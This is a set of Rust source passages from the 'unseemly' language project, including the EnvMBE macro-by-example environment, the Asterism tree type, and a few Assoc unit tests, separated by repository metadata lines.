assert_eq!(a2.cut_common(&a2), mt); // Partial share: assert_eq!(a2.cut_common(&a1), mt.set(6, 7)); assert_eq!(a_override.cut_common(&a2), mt.set(5, 500)); assert!(mt.almost_ptr_eq(&mt)); assert!(a2.almost_ptr_eq(&a2)); assert!(a_override_direct.almost_ptr_eq(&a_override_direct)); assert!(!a2.almost_ptr_eq(&a2_opposite)); // assert!(mt.almost_ptr_eq(&Assoc::new())); } #[test] fn assoc_r_and_r_roundtrip() { use num::BigInt; let mt: Assoc<BigInt, BigInt> = Assoc::new(); let a1 = mt.set(BigInt::from(5), BigInt::from(6)); let a2 = a1.set(BigInt::from(6), BigInt::from(7)); assert_eq!(mt, Assoc::<BigInt, BigInt>::reflect(&mt.reify())); assert_eq!(a2, Assoc::<BigInt, BigInt>::reflect(&a2.reify())); } #[test] fn assoc_map() { let a1 = assoc_n!("x" => 1, "y" => 2, "z" => 3); assert_eq!(a1.map(|a| a + 1), assoc_n!("x" => 2, "y" => 3, "z" => 4)); let a2 = assoc_n!("y" => -2, "z" => -3, "x" => -1); assert_eq!(a1.map_with(&a2, &|a, b| a + b), assoc_n!("x" => 0, "y" => 0, "z" => 0)); } #[test] fn assoc_reduce() { let a1 = assoc_n!("x" => 1, "y" => 2, "z" => 3); assert_eq!(a1.reduce(&|_key, a, b| a + b, 0), 6); let a1 = assoc_n!("x" => 1, "y" => 2, "z" => 3); assert_eq!(a1.reduce(&|key, a, b| if key.is("y") { b } else { a + b }, 0), 4); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/mbe.rs
src/util/mbe.rs
#![macro_use] // March By Example: a user-friendly way to handle named subterms under Kleene stars, // expressed through a special kind of environment. // This is intended to organize the subterms of an `Ast` node. // Using this as the evaluation environment of a program is probably interesting, // but not necessarily in a good way. // // // The principle, when applied to pattern-based macro definitions, is as follows: // Kleene stars in a macro grammar // (e.g. `[f=Identifier [arg=Identifier ":" arg_t=Type]*]` ) // correspond to lists in an AST. // The original syntactic structure is irrelevant. // but there's only one name (e.g. `arg_t`) for the entire list of matched syntax. // // This whole thing nicely generalizes to nesting: we use variable-arity trees instead of lists, // resulting in an `EnvMBE` (a March By Example Enviornment) // // For getting information *out* of an `EnvMBE`, // we provide an operation ("march") that, given a set of names // ("driving names", presumably the names "under the `*`") // produces `n` environments, in which each of those names has a tree // that is shorter by one level. // // One problem: what if two of the "driving names" repeat a different numbers of times? // Traditionally, this is a runtime error, // but we'd like it to be a parser error: // after all, it's the author of the syntax // who has control over how many repetions there are of each thing. // So, we will let grammars specify when different Kleene stars // must repeat the same number of times. // Violations of this rule are a parse error, // and it's only legal to "march" with driving names // that were matched (at the current level) // (a) under the same `*`, or // (b) under `*`s that must repeat the same number of times. // On the other hand, if the user wants "cross product" behavior, // there's no reason that they can't get it. // We may add a facility to take syntax matched `a`, `b`, `c`... times, // and produce `a × b × c` different environments. // // // This is based on Macro By Example, but this implementation isn't strictly about macros, // which is why I changed the name! // The original MBE paper is // "Macro-by-example: Deriving syntactic transformations from their specifications" // by Kohlbecker and Wand // ftp://www.cs.indiana.edu/pub/techreports/TR206.pdf // // Many interesting macros can be defined simply // by specifying a grammar and a piece of quoted syntax, // if the syntax transcription supports MBE. // (This corresponds to Scheme's `syntax-rules` and Rust's `macro-rules`.) use crate::{name::*, util::assoc::Assoc}; use std::{fmt, rc::Rc}; // How on earth can one data structure need so many variations on `map`? // There's got to be a better way! /// `EnvMBE` is like an environment, /// except that some of its contents are "repeats", /// which represent _n_ different values /// (or repeats of repeats, etc.). /// Non-repeated values may be retrieved by `get_leaf`. /// To access repeated values, one must `march` them, /// which produces _n_ different environments, /// in which the marched values are not repeated (or one layer less repeated). /// Marching multiple repeated values at once /// is only permitted if they were constructed to repeat the same number of times. #[derive(Eq, Clone, Default)] // `Clone` needs to traverse the whole `Vec` ): pub struct EnvMBE<T: Clone> { /// Non-repeated values leaves: Assoc<Name, T>, /// Outer vec holds distinct repetitions /// (i.e. differently-named, or entirely unnamed repetitions) /// Note that some of the entries may be obsolete; /// deletions are marked by putting `None` in the `Assoc`s /// that index into this. repeats: Vec<Rc<Vec<EnvMBE<T>>>>, /// Where in `repeats` to look, if we want to traverse for a particular leaf. /// We use `.unwrap_or(None)` when looking up into this /// so we can delete by storing `None`. leaf_locations: Assoc<Name, Option<usize>>, /// The location in `repeats` that represents a specific repetition name. named_repeats: Assoc<Name, Option<usize>>, } // `custom_derive!` (or maybe `Reifiable!`) can't handle type bounds, so we need to do this manually impl<T: Clone + crate::runtime::reify::Reifiable> crate::runtime::reify::Reifiable for EnvMBE<T> { fn ty_name() -> Name { n("EnvMBE") } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { Some(vec![T::ty_invocation()]) } fn reify(&self) -> crate::runtime::eval::Value { crate::runtime::eval::Value::Sequence(vec![ Rc::new(self.leaves.reify()), Rc::new(self.repeats.reify()), Rc::new(self.leaf_locations.reify()), Rc::new(self.named_repeats.reify()), ]) } fn reflect(v: &crate::runtime::eval::Value) -> Self { extract!((v) crate::runtime::eval::Value::Sequence = (ref parts) => { EnvMBE { leaves: <Assoc<Name, T>>::reflect(&*parts[0]), repeats: <Vec<Rc<Vec<EnvMBE<T>>>>>::reflect(&*parts[1]), leaf_locations: <Assoc<Name, Option<usize>>>::reflect(&*parts[2]), named_repeats: <Assoc<Name, Option<usize>>>::reflect(&*parts[3]) } }) } } impl<T: PartialEq + Clone> PartialEq for EnvMBE<T> { fn eq(&self, other: &EnvMBE<T>) -> bool { fn assoc_eq_modulo_none<K: Eq + std::hash::Hash + Clone, V: PartialEq + Clone>( lhs: &Assoc<K, Option<V>>, rhs: &Assoc<K, Option<V>>, ) -> bool { for (k, v_maybe) in lhs.iter_pairs() { if let Some(ref v) = *v_maybe { if let Some(&Some(ref other_v)) = rhs.find(k) { if !(v == other_v) { return false; } } else { return false; } } } for (other_k, other_v_maybe) in rhs.iter_pairs() { if let Some(ref other_v) = *other_v_maybe { if let Some(&Some(ref v)) = rhs.find(other_k) { if !(v == other_v) { return false; } } else { return false; } } } true } // This ought to handle permutations of `repeats` // (matched with permutations of the indices in the assocs) // but that's hard. self.leaves == other.leaves && self.repeats == other.repeats && assoc_eq_modulo_none(&self.leaf_locations, &other.leaf_locations) && assoc_eq_modulo_none(&self.named_repeats, &other.named_repeats) } } impl<T: Clone + fmt::Debug> fmt::Debug for EnvMBE<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.leaves.empty() && self.repeats.is_empty() { write!(f, "mbe∅") } else { write!(f, "{{ 🍂 {:#?}, ✶", self.leaves)?; let mut first = true; for (i, rep) in self.repeats.iter().enumerate() { if !first { write!(f, ", ")?; } first = false; // is it a named repeat? for (name, idx_maybe) in self.named_repeats.iter_pairs() { if let Some(idx) = *idx_maybe { if idx == i { write!(f, "⋯({:#?})⋯ ", name)?; } } } write!(f, "{:#?}", rep)?; } write!(f, "}}") } } } impl<T: Clone + fmt::Display> fmt::Display for EnvMBE<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.leaves.empty() && self.repeats.is_empty() { write!(f, "∅") } else { write!(f, "{{MBE {}, ✶", self.leaves)?; let mut first = true; for (i, rep) in self.repeats.iter().enumerate() { if !first { write!(f, ", ")?; } first = false; // is it a named repeat? for (name, idx_maybe) in self.named_repeats.iter_pairs() { if let Some(idx) = *idx_maybe { if idx == i { write!(f, "⋯({})⋯ ", name)?; } } } for mbe in &**rep { write!(f, "{} ", mbe)?; } } write!(f, "}}") } } } impl<T: Clone> EnvMBE<T> { pub fn new() -> EnvMBE<T> { EnvMBE { leaves: Assoc::new(), repeats: vec![], leaf_locations: Assoc::new(), named_repeats: Assoc::new(), } } /// Creates an `EnvMBE` without any repetition pub fn new_from_leaves(l: Assoc<Name, T>) -> EnvMBE<T> { EnvMBE { leaves: l, repeats: vec![], leaf_locations: Assoc::new(), named_repeats: Assoc::new(), } } /// Creates an `EnvMBE` containing a single anonymous repeat /// (HACK: there's no way to represent a name repeating zero times this way; /// use `new_from_empty_anon_repeat`) pub fn new_from_anon_repeat(r: Vec<EnvMBE<T>>) -> EnvMBE<T> { let mut res = EnvMBE::new(); res.add_anon_repeat(r); res } /// Creates an `EnvMBE` containing a single named repeat /// (HACK: there's no way to represent a name repeating zero times this way; /// use `new_from_empty_named_repeat`) pub fn new_from_named_repeat(n: Name, r: Vec<EnvMBE<T>>) -> EnvMBE<T> { let mut res = EnvMBE::new(); res.add_named_repeat(n, r); res } pub fn new_from_empty_anon_repeat(ks: &[Name]) -> EnvMBE<T> { let mut res = EnvMBE::new(); for k in ks { res.leaf_locations.mut_set(*k, Some(0)); } res.repeats.push(Rc::new(vec![])); res } pub fn new_from_empty_named_repeat(n: Name, ks: &[Name]) -> EnvMBE<T> { let mut res = EnvMBE::new(); for k in ks { res.leaf_locations.mut_set(*k, Some(0)); } res.repeats.push(Rc::new(vec![])); res.named_repeats.mut_set(n, Some(0)); res } /// Combine two `EnvMBE`s whose names (both environment names and repeat names) are disjoint, /// or just overwrite the contents of the previous one. /// This should maybe not be `pub` if we can avoid it. /// Note: ideally, the larger one should be on the LHS. pub fn combine_overriding(&self, rhs: &EnvMBE<T>) -> EnvMBE<T> { let adjust_rhs_by = self.repeats.len(); let mut new_repeats = self.repeats.clone(); new_repeats.append(&mut rhs.repeats.clone()); EnvMBE { leaves: self.leaves.set_assoc(&rhs.leaves), repeats: new_repeats, leaf_locations: self.leaf_locations.set_assoc( &rhs.leaf_locations.map(|idx_opt| idx_opt.map(|idx| idx + adjust_rhs_by)), ), named_repeats: self.named_repeats.set_assoc( &rhs.named_repeats.map(|idx_opt| idx_opt.map(|idx| idx + adjust_rhs_by)), ), } } /// Combine two `EnvMBE`s whose leaves should be disjoint, but which can contain /// named repeats with the same name. This should make sense for combining the results of /// matching two different chunks of a patern. pub fn merge(&self, rhs: &EnvMBE<T>) -> EnvMBE<T> { let mut res = self.clone(); let mut rhs_idx_is_named: Vec<bool> = rhs.repeats.iter().map(|_| false).collect(); // This could be made more efficient by just reusing the `Rc`s instead of cloning the // arrays, but that would require reworking the interface. for (n, rep_idx) in rhs.named_repeats.iter_pairs() { if let Some(rep_idx) = *rep_idx { if rhs.repeats[rep_idx].len() > 0 { res.add_named_repeat(*n, (*rhs.repeats[rep_idx]).clone()); } else { // Maybe pull this out as `.add_empty_named_repeat`? let empty_idx = if let Some(Some(rep_idx)) = res.named_repeats.find(n) { if res.repeats[*rep_idx].len() != 0 { panic!("Length mismatch; {} is supposed to repeat empty", n); } *rep_idx } else { let new_idx = res.repeats.len(); res.repeats.push(Rc::new(vec![])); res.named_repeats.mut_set(*n, Some(new_idx)); new_idx }; for (leaf_name, leaf_loc) in rhs.leaf_locations.iter_pairs() { if leaf_loc == &Some(rep_idx) { res.leaf_locations.mut_set(*leaf_name, Some(empty_idx)); } } } rhs_idx_is_named[rep_idx] = true; } } for (idx, rep) in rhs.repeats.iter().enumerate() { if !rhs_idx_is_named[idx] { if rep.len() > 0 { res.add_anon_repeat((**rep).clone()); } else { // Maybe pull this out as `.addempty__anon_repeat`? let empty_idx = res.repeats.len(); res.repeats.push(Rc::new(vec![])); for (leaf_name, leaf_loc) in rhs.leaf_locations.iter_pairs() { if leaf_loc == &Some(idx) { res.leaf_locations.mut_set(*leaf_name, Some(empty_idx)); } } } } } res.leaves = res.leaves.set_assoc(&rhs.leaves); res } /// Given `driving_names`, marches the whole set of names that can march with them. /// (Adding an additional name to `driving_names` will result in the same behavior, /// or a panic, in the case that the new name can't be marched with the existing ones.) /// /// This takes a `Vec` of `Name` instead of just one because a particular name might /// not be transcribed at all here, and thus can't tell us how to repeat. pub fn march_all(&self, driving_names: &[Name]) -> Vec<EnvMBE<T>> { let mut march_loc: Option<(usize, Name)> = None; for &n in driving_names { match (march_loc, self.leaf_locations.find(&n).unwrap_or(&None)) { (_, &None) => {} (None, &Some(loc)) => march_loc = Some((loc, n)), (Some((old_loc, old_name)), &Some(new_loc)) => { if old_loc != new_loc { panic!( "{:#?} and {:#?} cannot march together; they weren't matched to have \ the same number of repeats", old_name, n ); } } } } let march_loc = match march_loc { None => { return vec![]; } // FOOTGUN: assume that it is repeated zero times Some((loc, _)) => loc, }; let mut result = vec![]; for marched_out in self.repeats[march_loc].iter() { // TODO: should we allow cross-product marching by keeping around unused repeats? // Don't lose the current leaves: result .push(EnvMBE::new_from_leaves(self.leaves.clone()).combine_overriding(marched_out)); } result } /// Get a non-repeated thing in the enviornment pub fn get_leaf(&self, n: Name) -> Option<&T> { self.leaves.find(&n) } pub fn get_rep_leaf(&self, n: Name) -> Option<Vec<&T>> { // FOOTGUN: can't distinguish wrong leaf names from 0-repeated leaves // TODO: remove get_rep_leaf_or_panic, as this never returns `None` let mut res = vec![]; let leaf_loc = match self.leaf_locations.find(&n) { Some(&Some(ll)) => ll, _ => { return Some(vec![]); } }; for r in &*self.repeats[leaf_loc] { match r.get_leaf(n) { Some(leaf) => res.push(leaf), None => { return Some(vec![]); } // `march` can leave us with dead leaf_locations } } Some(res) } /// Extend with a non-repeated thing pub fn add_leaf(&mut self, n: Name, v: T) { self.leaves = self.leaves.set(n, v); } pub fn add_named_repeat(&mut self, n: Name, sub: Vec<EnvMBE<T>>) { if sub.is_empty() { return; } // no-op-ish, but keep the repeats clean (good for `eq`) match *self.named_repeats.find(&n).unwrap_or(&None) { None => { let new_index = self.repeats.len(); self.update_leaf_locs(new_index, &sub); self.repeats.push(Rc::new(sub)); self.named_repeats = self.named_repeats.set(n, Some(new_index)); } Some(idx) => { if self.repeats[idx].len() != sub.len() { panic!( "Named repetition {:#?} is repeated {:#?} times in one place, {:#?} times \ in another.", n, self.repeats[idx].len(), sub.len() ) } self.update_leaf_locs(idx, &sub); let mut new_repeats_at_idx = vec![]; for pairs in self.repeats[idx].iter().zip(sub.iter()) { new_repeats_at_idx.push(pairs.0.combine_overriding(pairs.1)); } self.repeats[idx] = Rc::new(new_repeats_at_idx); } } } pub fn add_anon_repeat(&mut self, sub: Vec<EnvMBE<T>>) { if sub.is_empty() { return; } // no-op-ish, but keep the repeats clean (good for `eq`) let new_index = self.repeats.len(); self.update_leaf_locs(new_index, &sub); self.repeats.push(Rc::new(sub)); } pub fn anonimize_repeat(&mut self, n: Name) { // Now you can't find me! self.named_repeats = self.named_repeats.set(n, None); } pub fn map<NewT: Clone, F>(&self, f: &mut F) -> EnvMBE<NewT> where F: FnMut(&T) -> NewT { self.named_map(&mut |_n, elt| f(elt)) } /// Map, but march the `ctxt` along with the structure of `self` pub fn map_marched_against<NewT: Clone, Mode: crate::walk_mode::WalkMode, F>( &self, f: &mut F, ctxt: &crate::ast_walk::LazyWalkReses<Mode>, ) -> EnvMBE<NewT> where F: FnMut(&T, &crate::ast_walk::LazyWalkReses<Mode>) -> NewT, { EnvMBE { leaves: self.leaves.map_borrow_f(&mut |t: &T| f(t, ctxt)), repeats: self .repeats .iter() .enumerate() .map(|(rpt_idx, rc_vec_mbe): (usize, &Rc<Vec<EnvMBE<T>>>)| { let marched_ctxts = match self.leaf_locations.find_value(&Some(rpt_idx)) { Some(this_rpt_name) => ctxt.march_all(&[*this_rpt_name]), None => { // This repeat has no leaves. let mut res = vec![]; res.resize(rc_vec_mbe.len(), ctxt.clone()); res } }; Rc::new( rc_vec_mbe .iter() .zip(marched_ctxts) .map( |(mbe, marched_ctxt): ( &EnvMBE<T>, crate::ast_walk::LazyWalkReses<Mode>, )| { mbe.map_marched_against(f, &marched_ctxt) }, ) .collect(), ) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: self.named_repeats.clone(), } } pub fn named_map<NewT: Clone, F>(&self, f: &mut F) -> EnvMBE<NewT> where F: FnMut(&Name, &T) -> NewT { EnvMBE { leaves: self.leaves.keyed_map_borrow_f(f), repeats: self .repeats .iter() .map(|rc_vec_mbe: &Rc<Vec<EnvMBE<T>>>| { Rc::new(rc_vec_mbe.iter().map(|mbe: &EnvMBE<T>| mbe.named_map(f)).collect()) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: self.named_repeats.clone(), } } pub fn map_reduce<NewT: Clone>( &self, f: &dyn Fn(&T) -> NewT, red: &dyn Fn(&NewT, &NewT) -> NewT, base: NewT, ) -> NewT { let reduced: NewT = self.leaves.map(f).reduce(&|_k, v, res| red(v, &res), base); self.repeats.iter().fold(reduced, |base: NewT, rc_vec_mbe: &Rc<Vec<EnvMBE<T>>>| { rc_vec_mbe.iter().fold(base, |base: NewT, mbe: &EnvMBE<T>| mbe.map_reduce(f, red, base)) }) } /// Provide the map function with the name of the current leaf, /// and the appropriately-marched context element pub fn marched_map<NewT: Clone, F>(&self, f: &mut F) -> EnvMBE<NewT> where F: FnMut(Name, &EnvMBE<T>, &T) -> NewT { self.marched_map_rec(self, f) } fn marched_map_rec<NewT: Clone, F>(&self, outer: &EnvMBE<T>, f: &mut F) -> EnvMBE<NewT> where F: FnMut(Name, &EnvMBE<T>, &T) -> NewT { let local_mbe = outer.combine_overriding(self); let new_leaves = self.leaves.keyed_map_borrow_f(&mut |n: &Name, elt: &T| f(*n, &local_mbe, elt)); EnvMBE { leaves: new_leaves, repeats: self .repeats .iter() .map(|rc_vec_mbe: &Rc<Vec<EnvMBE<T>>>| { Rc::new( rc_vec_mbe .iter() .map(|marched_out: &EnvMBE<T>| marched_out.marched_map_rec(outer, f)) .collect(), ) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: self.named_repeats.clone(), } } // TODO: we should just have the relevant functions return None... pub fn can_map_with(&self, o: &EnvMBE<T>) -> bool { let mut lhs_keys = std::collections::HashSet::<Name>::new(); for (k, _) in self.leaves.iter_pairs() { lhs_keys.insert(*k); } let mut rhs_keys = std::collections::HashSet::<Name>::new(); for (k, _) in o.leaves.iter_pairs() { rhs_keys.insert(*k); } if lhs_keys != rhs_keys { return false; } if self.repeats.len() != o.repeats.len() { return false; } for (subs, o_subs) in self.repeats.iter().zip(o.repeats.iter()) { if subs.len() != o_subs.len() { return false; } for (mbe, o_mbe) in subs.iter().zip(o_subs.iter()) { if !mbe.can_map_with(o_mbe) { return false; } } } true } pub fn map_with<S: Clone, NewT: Clone>( &self, o: &EnvMBE<S>, f: &dyn Fn(&T, &S) -> NewT, ) -> EnvMBE<NewT> { self.named_map_with(o, &|_name, l, r| f(l, r)) } pub fn named_map_with<S: Clone, NewT: Clone>( &self, o: &EnvMBE<S>, f: &dyn Fn(&Name, &T, &S) -> NewT, ) -> EnvMBE<NewT> { EnvMBE { leaves: self.leaves.keyed_map_with(&o.leaves, f), // This assumes that "equivalent" repeats have the same indices... ) : repeats: self .repeats .iter() .zip(o.repeats.iter()) .map(&|(rc_vec_mbe, o_rc_vec_mbe): (&Rc<Vec<EnvMBE<T>>>, &Rc<Vec<EnvMBE<S>>>)| { Rc::new( rc_vec_mbe .iter() .zip(o_rc_vec_mbe.iter()) .map(|(mbe, o_mbe)| mbe.named_map_with(o_mbe, f)) .collect(), ) }) .collect(), leaf_locations: self.leaf_locations.clone(), named_repeats: self.named_repeats.clone(), } } pub fn map_reduce_with<S: Clone, NewT: Clone>( &self, other: &EnvMBE<S>, f: &dyn Fn(&T, &S) -> NewT, red: &dyn Fn(NewT, NewT) -> NewT, base: NewT, ) -> NewT { // TODO #15: this panics all over the place if anything goes wrong let mut reduced: NewT = self.leaves.map_with(&other.leaves, f).reduce(&|_k, v, res| red(v.clone(), res), base); let mut already_processed: Vec<bool> = self.repeats.iter().map(|_| false).collect(); for (leaf_name, self_idx) in self.leaf_locations.iter_pairs() { let self_idx = match *self_idx { Some(si) => si, None => { continue; } }; if already_processed[self_idx] { continue; } already_processed[self_idx] = true; let other_idx = other.leaf_locations.find_or_panic(leaf_name).unwrap(); for (self_elt, other_elt) in self.repeats[self_idx].iter().zip(other.repeats[other_idx].iter()) { reduced = self_elt.map_reduce_with(other_elt, f, &red, reduced); } } reduced } fn update_leaf_locs(&mut self, idx: usize, sub: &[EnvMBE<T>]) { let mut already_placed_leaves = std::collections::HashSet::<Name>::new(); let mut already_placed_repeats = std::collections::HashSet::<Name>::new(); for sub_mbe in sub { for leaf_name in sub_mbe.leaf_locations.iter_keys().chain(sub_mbe.leaves.iter_keys()) { if !already_placed_leaves.contains(leaf_name) { self.leaf_locations = self.leaf_locations.set(*leaf_name, Some(idx)); already_placed_leaves.insert(*leaf_name); } } for repeat_name in sub_mbe.named_repeats.iter_keys() { if !already_placed_repeats.contains(repeat_name) { self.named_repeats = self.named_repeats.set(*repeat_name, Some(idx)); already_placed_repeats.insert(*repeat_name); } } } } // If `f` turns a leaf into a `Vec`, splice those results in pub fn heal_splices<E>( &mut self, f: &dyn Fn(&T) -> Result<Option<Vec<T>>, E>, ) -> Result<(), E> { for repeat in &mut self.repeats { let mut cur_repeat: Vec<EnvMBE<T>> = (**repeat).clone(); let mut i = 0; while i < cur_repeat.len() { cur_repeat[i].heal_splices(f)?; let mut splices = vec![]; { let n_and_vals = cur_repeat[i].leaves.iter_pairs(); for (n, val) in n_and_vals { if let Some(splice) = f(val)? { splices.push((*n, splice)); } } } if !splices.is_empty() { let mut template = cur_repeat.remove(i); // TODO: each of the splices better be the same length. // I don't know what has to go wrong to violate that rule. for rep in 0..splices[0].1.len() { for splice in &splices { template.add_leaf(splice.0, splice.1[rep].clone()); } cur_repeat.insert(i + rep, template.clone()) } i += splices[0].1.len(); } else { i += 1; } } *repeat = Rc::new(cur_repeat) } Ok(()) } // TODO: this should return a usable error pub fn heal_splices__with<E, S: Clone>( &mut self, other: &EnvMBE<S>, f: &dyn Fn(&T, &dyn Fn() -> Vec<S>) -> Result<Option<Vec<T>>, E>, ) -> Result<(), E> where T: std::fmt::Debug, { for repeat in &mut self.repeats { // Find the same repeat in `other`: let mut names_needed = vec![]; for (name, _) in self.leaf_locations.iter_pairs() { names_needed.push(name); } let other__rep_loc = match other.leaf_locations.find(names_needed[0]) { Some(Some(l)) => *l, _ => { return Ok(()); // Should become a mismatch error elsewhere (TODO: make an `E`) } }; let other__cur_repeat: &Vec<EnvMBE<S>> = &*other.repeats[other__rep_loc]; let mut cur_repeat: Vec<EnvMBE<T>> = (**repeat).clone(); // If an item splices, how wide does the other side need to be // in order to make everything line up? let splice_length = (other__cur_repeat.len() + 1).checked_sub(cur_repeat.len()).unwrap(); let mut i = 0; let mut other_i = 0; while i < cur_repeat.len() && other_i < other__cur_repeat.len() { cur_repeat[i].heal_splices__with(&other__cur_repeat[other_i], f)?; let mut splices = vec![]; { let n_and_vals = cur_repeat[i].leaves.iter_pairs(); for (n, val) in n_and_vals { let concrete_splice__thunk = || { let mut result = vec![]; for other_i in other__cur_repeat.iter().skip(i).take(splice_length) { result.push(other_i.leaves.find_or_panic(n).clone()) } result }; if let Some(splice) = f(val, &concrete_splice__thunk)? { splices.push((*n, splice)); } } } if !splices.is_empty() { let mut template = cur_repeat.remove(i); // TODO: each of the splices better be the same length. // I don't know what has to go wrong to violate that rule. for rep in 0..splices[0].1.len() { for splice in &splices { template.add_leaf(splice.0, splice.1[rep].clone()); } cur_repeat.insert(i + rep, template.clone()) } i += splice_length; other_i += splice_length; } else { i += 1; other_i += 1; } } // The lengths might not line up, but that doesn't mean matching will fail! // struct {a : Int b : Nat} <: struct {a : Int b : Nat c : Float} *repeat = Rc::new(cur_repeat) } Ok(()) } } impl<T: Clone, E: Clone> EnvMBE<Result<T, E>> { // Is `lift` the right term? pub fn lift_result(&self) -> Result<EnvMBE<T>, E> { // There's probably a nice and elegant way to do this with Result::from_iter, but not today let mut leaves: Assoc<Name, T> = Assoc::new(); for (k, v) in self.leaves.iter_pairs() { leaves = leaves.set(*k, (*v).clone()?); } let mut repeats = vec![]; for rep in &self.repeats { let mut items = vec![]; for item in &**rep { items.push(item.lift_result()?); } repeats.push(Rc::new(items)); } Ok(EnvMBE {
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/util/asterism.rs
src/util/asterism.rs
use std::{fmt, iter::Iterator}; // An `Asterism` is a tree with an arbirary arity at each node, // but all leaves are at the same depth. // This structure arises from parsing under Kleene stars; each star correspons to a level of nodes. // [ ] <- 2 children // [ ][ ] <- 3, 1 children // [ ][][ ][ ] <- 5, 0, 1, 2 children // [ ][ ][ ][ ][ ] [ ][ ][ ] <- 2, 1, 2, 2, 2, 4, 1, 1 children // a b c d e f g h i j k l m n o // * * # a b # c # d e # f g # h i * * # j k l m * * # n # o // ----| --| ----| ----| ----| | --------| --| --| <- these are `PackedNodes`es // ----------------------------| | ----------| --------| <- everything below is a `Node` // --------------------------------------------| ----------| <- ⋮ #[derive(Debug, PartialEq, Eq, Clone)] /// This is only `pub` for technical reasons; it doesn't need to be exposed to other modules. /// /// `Node`s and `PackedNodes`es appear at the beginning of a slice to guide marching. /// If you see `[PackedNodes, …]`, you know you're at depth 1 and [1..] is your leaves. /// Otherwise, `[Node(n), <n entries>, Node(m), <m entries>, …]` is the shape of the current level. pub enum LeafOrNode<T> { Leaf(T), /// A depth-1 node: *each* subtree is a single `Leaf` PackedNodes, /// A depth >1 node: *this* subtree is `usize` entires long Node(usize), } #[derive(PartialEq, Eq, Clone)] pub struct Asterism<T>(Vec<LeafOrNode<T>>); #[derive(PartialEq, Eq)] pub struct AsterismSlice<'a, T>(&'a [LeafOrNode<T>]); // `AsterismSlice` is a reference-like type, so it's always `Clone` and `Copy`, even if `T` isn't: impl<'a, T> Copy for AsterismSlice<'a, T> {} impl<'a, T> Clone for AsterismSlice<'a, T> { fn clone(&self) -> AsterismSlice<'a, T> { *self } } /// This trait is for reference-like views of `Asterism`. pub trait AsterMarchable<'a, T: 'a>: Sized + Clone + Copy { fn as_slice(self) -> AsterismSlice<'a, T>; /// Only used for implementation of other methods; /// adding another layer of trait seems like too much trouble to hide this. fn inner(self) -> &'a [LeafOrNode<T>]; /// Returns an iterator of `AsterMarchable<T>`s fn march(self) -> std::vec::IntoIter<AsterismSlice<'a, T>> { let mut subs = vec![]; if self.inner().is_empty() { return subs.into_iter(); } // A `PackedNodes` means the rest of the slice is our children (all leaves): let depth_1: bool = matches!(self.inner()[0], LeafOrNode::PackedNodes); let mut i = if depth_1 { 1 } else { 0 }; // Skip the `PackedNodes` while i < self.inner().len() { let span = match self.inner()[i] { LeafOrNode::Leaf(_) => { if !depth_1 { icp!("Unexpected Leaf") } 1 } LeafOrNode::PackedNodes => icp!("Unexpected PackedNodes"), LeafOrNode::Node(span) => { if depth_1 { icp!("Unexpected Node") } i += 1; span } }; subs.push(AsterismSlice(&self.inner()[i..i + span])); i += span; } subs.into_iter() } fn collect(self) -> Vec<AsterismSlice<'a, T>> { let mut res = vec![]; for sub in self.march() { res.push(sub); } res } fn is_leaf(self) -> bool { let inner = self.as_slice().0; if inner.is_empty() { return false; } matches!(inner[0], LeafOrNode::Leaf(_)) } fn as_leaf(self) -> &'a T { let inner = self.as_slice().0; if inner.len() != 1 { icp!("not a leaf, length is {}", inner.len()) } match inner[0] { LeafOrNode::Leaf(ref l) => l, _ => icp!("malformed Asterism"), } } fn as_depth_1(self) -> Box<dyn Iterator<Item = &'a T> + 'a> { if self.as_slice().0.is_empty() { // The "official" representation of an empty depth-1 node is a sequence with 1 `PN`. // ...but `Asterism::join(vec![])` doesn't know whether it's depth-1 or not! // So we also support an empty vector. // TODO: is there a better way? return Box::new(std::iter::empty()); } match self.as_slice().0[0] { LeafOrNode::PackedNodes => {} _ => icp!("Not depth-1"), } Box::new(self.as_slice().0[1..].iter().map(|lon| match lon { LeafOrNode::Leaf(ref l) => l, _ => icp!("Not depth-1"), })) } } impl<'a, T> AsterMarchable<'a, T> for AsterismSlice<'a, T> { fn as_slice(self) -> AsterismSlice<'a, T> { self } fn inner(self) -> &'a [LeafOrNode<T>] { self.0 } } impl<'a, T> AsterMarchable<'a, T> for &'a Asterism<T> { fn as_slice(self) -> AsterismSlice<'a, T> { AsterismSlice(&self.0[..]) } fn inner(self) -> &'a [LeafOrNode<T>] { &self.0[..] } } impl<T> Asterism<T> { pub fn join(subs: Vec<Asterism<T>>) -> Asterism<T> { let mut res = vec![]; if subs.is_empty() { return Asterism(vec![LeafOrNode::Node(0)]); } if !subs[0].0.is_empty() && matches!(subs[0].0[0], LeafOrNode::Leaf(_)) { let mut res = vec![LeafOrNode::PackedNodes]; for mut leaf_asterism in subs { if !leaf_asterism.is_leaf() { icp!("Not a valid leaf"); } res.push(leaf_asterism.0.remove(0)); } return Asterism(res); } for mut aster in subs { res.push(LeafOrNode::Node(aster.0.len())); res.append(&mut aster.0); } Asterism(res) } pub fn from_leaf(leaf: T) -> Asterism<T> { Asterism(vec![LeafOrNode::Leaf(leaf)]) } pub fn from_depth_1(leaves: Vec<T>) -> Asterism<T> { let mut res = vec![LeafOrNode::PackedNodes]; for leaf in leaves { res.push(LeafOrNode::Leaf(leaf)) } Asterism(res) } } impl<'a, T: Clone> AsterismSlice<'a, T> { pub fn to_asterism(self) -> Asterism<T> { Asterism(self.0.to_vec()) } } impl<T: fmt::Debug> fmt::Debug for AsterismSlice<'_, T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { if self.is_leaf() { write!(f, "{:?}", self.as_leaf()) } else { write!(f, "[")?; let mut first = true; for ref sub in self.march() { if !first { write!(f, " ")?; } write!(f, "{:?}", sub)?; first = false; } write!(f, "]") } } } impl<T: fmt::Debug> fmt::Debug for Asterism<T> { fn 